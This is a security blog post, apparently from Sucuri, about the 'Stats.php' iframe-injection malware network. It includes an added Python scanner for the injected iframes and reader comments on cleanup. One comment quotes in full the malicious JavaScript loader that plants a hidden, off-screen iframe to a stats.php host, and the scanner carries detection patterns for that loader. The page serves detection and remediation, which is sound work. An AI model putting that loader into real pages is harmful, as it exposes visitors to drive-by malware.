We are seeing a large and distributed malware network comprised of thousands of infected websites that is growing very quickly. We call it “Stats.php” because all of the infected websites have the following iframe added to them:
<iframe src="http://hackedsite.com/stats.php" name="Twitter" ..
Stats.php is an iFrame Injection attack. This is not a new issue by any means, and we have been posting details in Sucuri Labs for a little while. However, lately we started to see an increase in the number of websites getting hacked by it (a significant increase in the last 3 days).
Once inserted, these iFrames can be controlled to distribute malware, and they can also be used to add things like drive-by downloads and other browser-based attacks. Although the exact infection vector is unknown, the malware has been found on sites running known outdated software, and in some cases known vulnerable versions.
Here is a preliminary shortlist of websites we are seeing used to attack, and the number of websites that have been compromised by each:
If you were to visit any of these directly, you would get either a blacklist warning from Google, or a 404 error as some have been removed already.
How does a distributed web-based malware network function?
Site-X.com is hacked and a malicious file named stats.php is placed on it; an iFrame pointing to Site-Y.com/stats.php is then added to its source code. Site-Y.com has also been compromised: it has its own stats.php file and an iFrame pointing to Site-Z.com/stats.php. When all is said and done, you have a large network of compromised sites, all linking to each other and all carrying the same malware.
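As an added illustration (not Sucuri's code or tooling), the scanner below flags both forms of the injection seen on this page, the raw <iframe> tag and a JavaScript createElement('iframe') loader, and lists the upstream hosts a site pulls stats.php from, which is the site's next hop in the network. The sample files and their hostnames are constructed placeholders, not sites from the post.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample files modelled on the two injection forms: the raw
# <iframe> tag and a JavaScript createElement('iframe') loader. Hostnames
# are placeholders, not sites from the post.
SAMPLES = {
    "header.php": ('<?php get_header(); ?>\n<iframe src="http://hackedsite.example/stats.php" '
                   'name="Twitter" width="1" height="1"></iframe>'),
    "New_Folder/jquery.effects.fade.min.js": (
        "var _q=document.createElement('iframe'),_n='setAttribute';"
        "_q[_n]('src','http://other-victim.example/stats.php');_q.style.left='-4327px';"),
    "index.html": "<html><body><p>clean page</p></body></html>",
}

# An <iframe ...> tag whose src ends in stats.php.
IFRAME_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']([^"\']*?stats\.php)["\']', re.I)
# The JS variant builds the iframe at runtime: require createElement('iframe')
# plus a quoted stats.php URL somewhere in the same file.
JS_CREATE_RE = re.compile(r"""createElement\s*\(\s*['"]iframe['"]\s*\)""", re.I)
JS_URL_RE = re.compile(r"""['"](https?://[^'"\s]*?stats\.php)['"]""", re.I)

def scan_content(name, text):
    """Return (file, kind, url) for each stats.php iframe reference found."""
    hits = [(name, "html-iframe", m.group(1)) for m in IFRAME_RE.finditer(text)]
    if JS_CREATE_RE.search(text):
        hits += [(name, "js-iframe", m.group(1)) for m in JS_URL_RE.finditer(text)]
    return hits

def scan_files(files):
    """Scan a {path: content} mapping (e.g. SAMPLES); returns all findings."""
    return [h for name, text in files.items() for h in scan_content(name, text)]

def scan_directory(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a real webroot and scan files with web extensions."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(exts):
                p = os.path.join(dirpath, n)
                with open(p, errors="replace") as fh:
                    files[p] = fh.read()
    return scan_files(files)

def upstream_hosts(findings):
    """Hosts this site pulls stats.php from: its next hop in the network."""
    return sorted({urlparse(url).hostname for _, _, url in findings})
```

Run scan_directory() against a copy of the webroot; a hit only tells you where the iframe is written, so the stats.php file itself and any other modified PHP files still need to be found and removed.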
If you have any questions about Stats.php or you want to add more info, feel free to leave a comment, or email us at info@sucuri.net.
7 comments
Hi, I have a wordpress 3.0 site with this oxsanasiberians.com stats.php script. I can’t locate in which file the script is inserted (although it all started with changes to .htaccess and header.php, as well as file permissions). Scans say it comes on my homepage, but again I can’t find the responsible file. I uploaded a new version of a backed up version, and still get the error. I wonder if the DB is also affected. Any clue?
I put details on wordpress forum here
http://wordpress.org/support/topic/malware-oxsanasiberianscom-attack
Is it only affecting WP sites? Is it specific to sites with PHP?
No it is beyond just wordpress. I was first following this as a Pharma-Hack. Which I believe I had, but now I have this. One of the things I did to slow it down was I deleted every single file in the root of my hosting account (even system files) and uploaded a fresh copy from my masters. Then changed my FTP passwords. One of the times that I did this, while I was uploading I got a credentials prompt from my ftp software. But I have this saved in my software so it will autopopulate it. But this time, it had a scrambled username! Script generated! Which would prompt me to re-enter my real FTP info. My point is, I think I fell for this ONCE, but never again. But it has not been back. So I think this is how it originally got in. But my site still gets hacked.
You cannot just delete the stats.php file. It randomly opens .php files in my site, writes script to them to access or include another script that it has created and ALSO hidden on my site. So when you visit any of these files publicly, it will re-install all of it again, keeping the malware alive and hence part of the network!
Our website was hacked on 6/7 and several key index.asp files edited to open a JavaScript (jquery.effects.fade.min.js) which contained the following:
var _q = document.createElement('iframe'), _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');  // iframe pointing at the stats.php node
_q.style.position = 'absolute';
_q.style.width = '12px';
// indexOf() returns -1 unless that string is in the user agent, so frameborder is set to 0
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';  // pushed off-screen so the visitor never sees it
document.write('');  // the argument was not preserved on this page; presumably it wrote the 'pzeadv' element
document.getElementById('pzeadv').appendChild(_q);
The JavaScript itself was installed in a “New_Folder” folder.
Our website is not a wordpress website!
I was able to solve this problem when I changed my FTP passwords and switched from Filezilla to WinSCP. Read about it here: http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/